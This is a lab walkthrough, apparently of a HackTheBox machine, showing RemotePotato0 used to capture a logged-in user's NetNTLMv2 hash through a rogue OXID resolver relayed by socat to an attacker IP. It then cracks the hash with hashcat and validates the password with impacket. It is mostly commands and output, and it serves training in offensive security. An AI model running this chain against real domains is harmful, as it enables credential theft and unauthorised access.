InfoSec LAB

Rebound_Lateral_Movement_tbrady

Created: 7 min read

RemotePotato0

During the earlier assessment with the additional BloodHound, the tbrady user has been suspected to have an active session to the DC host. While the discovery alone does not necessarily guarantees a solid progression toward lateral movement, it poses attackers an opportunity to investigate further into the active session that could potentially lead to exploiting it

while researching online, i found the following tool below that appears to be appropriate to the current assessment due to the presence of an active user session.

  • DCOM
    • distributed component object model (dcom) is Microsoft’s protocol for creating remote objects called COM objects and calling their methods.
    • It’s implemented on top of MSRPC.
  • OXID Resolution
    • OXID resolution is the process of obtaining the remote procedure call (RPC) binding information that is required to communicate with the object exporter.
    • You can think of it as a DNS for finding COM objects.
  • Marshalled COM objects
    • Marshalling is like serialization.
    • COM objects can be marshalled to be sent over the network.
  • Session 0
    • Each user which logs into a Windows machine gets a new session.
    • Session 0 is the initial session that is created on startup and runs mostly services. (or target user. In this case, tbrady)

The vulnerability is present due to the following;

  1. User Impersonation. When a COM object with certain vulnerable CLSIDs is created in session 0 in Windows, the local COM server – which creates the object – impersonates the user which is logged in on that computer’s first interactive session.
  2. COM Marshalling. Marshalled COM objects in Windows can contain a field which specifies the bindings for the OXID Resolver. The process of unmarshalling a COM object includes asking the OXID Resolver for the COM object’s RPC bindings.

additional info

Compiling

PS C:\Users\tacticalgator\source\repos> git clone https://github.com/antonioCoco/RemotePotato0.git ; cd RemotePotato0
Cloning into 'RemotePotato0'...
remote: Enumerating objects: 154, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (27/27), done.
Receiving objects: 100% (154/154), 21.29 MiB | 7.37 MiB/s, done.
remote: Total 154 (delta 42), reused 33 (delta 33), pack-reused 94
Resolving deltas: 100% (82/82), done.
 
PS C:\Users\tacticalgator\source\repos\RemotePotato0> start .\RemotePotato0.sln

I will download the exploit and open it up in Visual Studio

According to the documentation, the correct Windows SDK would be 10.0.17763.0 since the target system is Windows 10 Version 1809 However, the lowest Windows SDK that I have available is 10.0.19041.0, and it would likely be backward-compatible

Build started...
1>------ Build started: Project: RemotePotato0, Configuration: Release x64 ------
1>64 bit Processing .\IStandardActivator.idl
1>IStandardActivator.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oaidl.idl
1>oaidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\objidl.idl
1>objidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\unknwn.idl
1>unknwn.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\wtypes.idl
1>wtypes.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\wtypesbase.idl
1>wtypesbase.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\basetsd.h
1>basetsd.h
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\guiddef.h
1>guiddef.h
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\ocidl.idl
1>ocidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oleidl.idl
1>oleidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\servprov.idl
1>servprov.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\urlmon.idl
1>urlmon.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\msxml.idl
1>msxml.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oaidl.acf
1>oaidl.acf
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\ocidl.acf
1>ocidl.acf
1>64 bit Processing .\RogueOxidResolver.idl
1>RogueOxidResolver.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oaidl.idl
1>oaidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\objidl.idl
1>objidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\unknwn.idl
1>unknwn.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\wtypes.idl
1>wtypes.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\wtypesbase.idl
1>wtypesbase.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\basetsd.h
1>basetsd.h
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\guiddef.h
1>guiddef.h
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\ocidl.idl
1>ocidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oleidl.idl
1>oleidl.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\servprov.idl
1>servprov.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\urlmon.idl
1>urlmon.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\msxml.idl
1>msxml.idl
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\oaidl.acf
1>oaidl.acf
1>64 bit Processing C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\ocidl.acf
1>ocidl.acf
1>HTTPCrossProtocolRelay.cpp
1>IStorageTrigger.cpp
1>RelayLib.cpp
1>RemotePotato0.cpp
1>RogueOxidResolver.cpp
1>RPCCaptureServer.cpp
1>RogueOxidResolver_s.c
1>Generating code
1>Previous IPDB not found, fall back to full compilation.
1>All 184 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
1>Finished generating code
1>RemotePotato0.vcxproj -> C:\Users\tacticalgator\source\repos\RemotePotato0\x64\Release\RemotePotato0.exe
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========

Build complete

Execution

ps c:\Users\tacticalgator\source\repos\RemotePotato0\x64\Release\> scp .\RemotePotato0.exe kali@kali:~/archive/htb/labs/rebound/
remotepotato0.exe                                                   100%  184kb   7.3mb/s   00:00
 
*evil-winrm* ps c:\Users\winrm_svc\Documents> upload RemotePotato0.exe C:\Users\winrm_svc\Documents
 
info: Uploading /home/kali/archive/htb/labs/rebound/RemotePotato0.exe to C:\Users\winrm_svc\Documents
data: 250536 bytes of 250536 bytes copied
info: Upload successful!

Delivery complete

*evil-winrm* ps c:\Users\winrm_svc\Documents> .\RemotePotato0.exe 
 
 
	RemotePotato0
	@splinter_code & @decoder_it
 
 
 
mandatory args:
-m module
	allowed values:
	0 - Rpc2Http cross protocol relay server + potato trigger (default)
	1 - Rpc2Http cross protocol relay server
	2 - Rpc capture (hash) server + potato trigger
	3 - Rpc capture (hash) server
 
 
other args: (someone could be mandatory and/or optional based on the module you use)
-r Remote HTTP relay server ip
-t Remote HTTP relay server port (Default 80)
-x Rogue Oxid Resolver ip (default 127.0.0.1)
-p Rogue Oxid Resolver port (default 9999)
-l RPC Relay server listening port (Default 9997)
-s Session id for the Cross Session Activation attack (default disabled)
-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})

While RemotePotato0 supports NTLM relay to other protocols such as LDAP, I only need to grab the authentication hash It would likely need to setup a Rogue OXIDResolver just like RoguePotato since the target system is much older for the built-in JuicyPotato

*evil-winrm* ps c:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 
[!] Detected a Windows Server version not compatible with JuicyPotato, you cannot run the RogueOxidResolver on 127.0.0.1. RogueOxidResolver must be run remotely.
[!] example network redirector:
	sudo socat -v tcp-listen:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999

As expected, RemotePotato0 prompts that the target system is not compatible with JuicyPotato and I would have to set up a Rogue OXIDResolver remotely

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ socat -v tcp-listen:135,fork,reuseaddr TCP:$IP:9999

Setting up the socat network forwarder (Rogue OXIDResolver)

*evil-winrm* ps c:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.14.17 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] example network redirector:
	sudo socat -v tcp-listen:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] calling cogetinstancefromistorage with clsid:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...

executing remotepotato0 with the command above would calls cogetinstancefromistorage() with a vulnerable CLSID(5167B42F-C111-47A1-ACC4-8EABE61B0B54) and initializes it with an IStorage object that points to the attacker’s fake OXID Resolver. The following is the breakdown;

  • this marshals the istorage com object, instanciates the privileged COM server from the existing session(tbrady), and then unmarshalls the object in the server’s security context.
  • The unmarshalling of the IStorage object then triggers a request to the fake OXID Resolver.

In the socat network forwarder that I setup earlier received the RPC bindings of OXID resolutions requested from the unmarshalling of the IStorage object earlier it would returns rpc bindings to the remotepotato0’s’ fake rpc server listening on 127.0.0.1:9999 upon return, the privileged com server instantiated from the existing session(tbrady) which is impersonating the user would start the NTLM authentication procedure with the fake RPC server; 127.0.0.1:9997 The result would be relayed.

tbrady::rebound:d9e2170d79785349:6603574f8fe626e576a92a95b90fa8ea:0101000000000000145c4114a7e5d901457c89c22ba0eb3c0000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800145c4114a7e5d901060004000600000008003000300000000000000001000000002000002fc7f7acabbde0b284c06633c983b38f708ccfa064047716c780c6b764dc743b0a00100000000000000000000000000000000000090000000000000000000000 There is the relayed NTLM authentication

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ hashcat -a 0 -m 5600 tbrady.hash /usr/share/wordlists/rockyou.txt       
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
TBRADY::rebound:d9e2170d79785349:6603574f8fe626e576a92a95b90fa8ea:0101000000000000145c4114a7e5d901457c89c22ba0eb3c0000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800145c4114a7e5d901060004000600000008003000300000000000000001000000002000002fc7f7acabbde0b284c06633c983b38f708ccfa064047716c780c6b764dc743b0a00100000000000000000000000000000000000090000000000000000000000:543BOMBOMBUNmanda
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TBRADY::rebound:d9e2170d79785349:6603574f8fe626e576...000000
Time.Started.....: Tue Sep 12 20:27:06 2023 (5 secs)
Time.Estimated...: Tue Sep 12 20:27:11 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2244.5 kH/s (0.85ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12192768/14344385 (85.00%)
Rejected.........: 0/12192768 (0.00%)
Restore.Point....: 12189696/14344385 (84.98%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 5440166 -> 54238426
Hardware.Mon.#1..: Util: 60%
 
Started: Tue Sep 12 20:26:43 2023
Stopped: Tue Sep 12 20:27:12 2023

Password hash cracked for the tbrady user; 543BOMBOMBUNmanda

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-getTGT rebound.htb/tbrady@dc01.rebound.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: 543BOMBOMBUNmanda
[*] Saving ticket in tbrady@dc01.rebound.htb.ccache

Validated

Interactive Graph View

Backlinks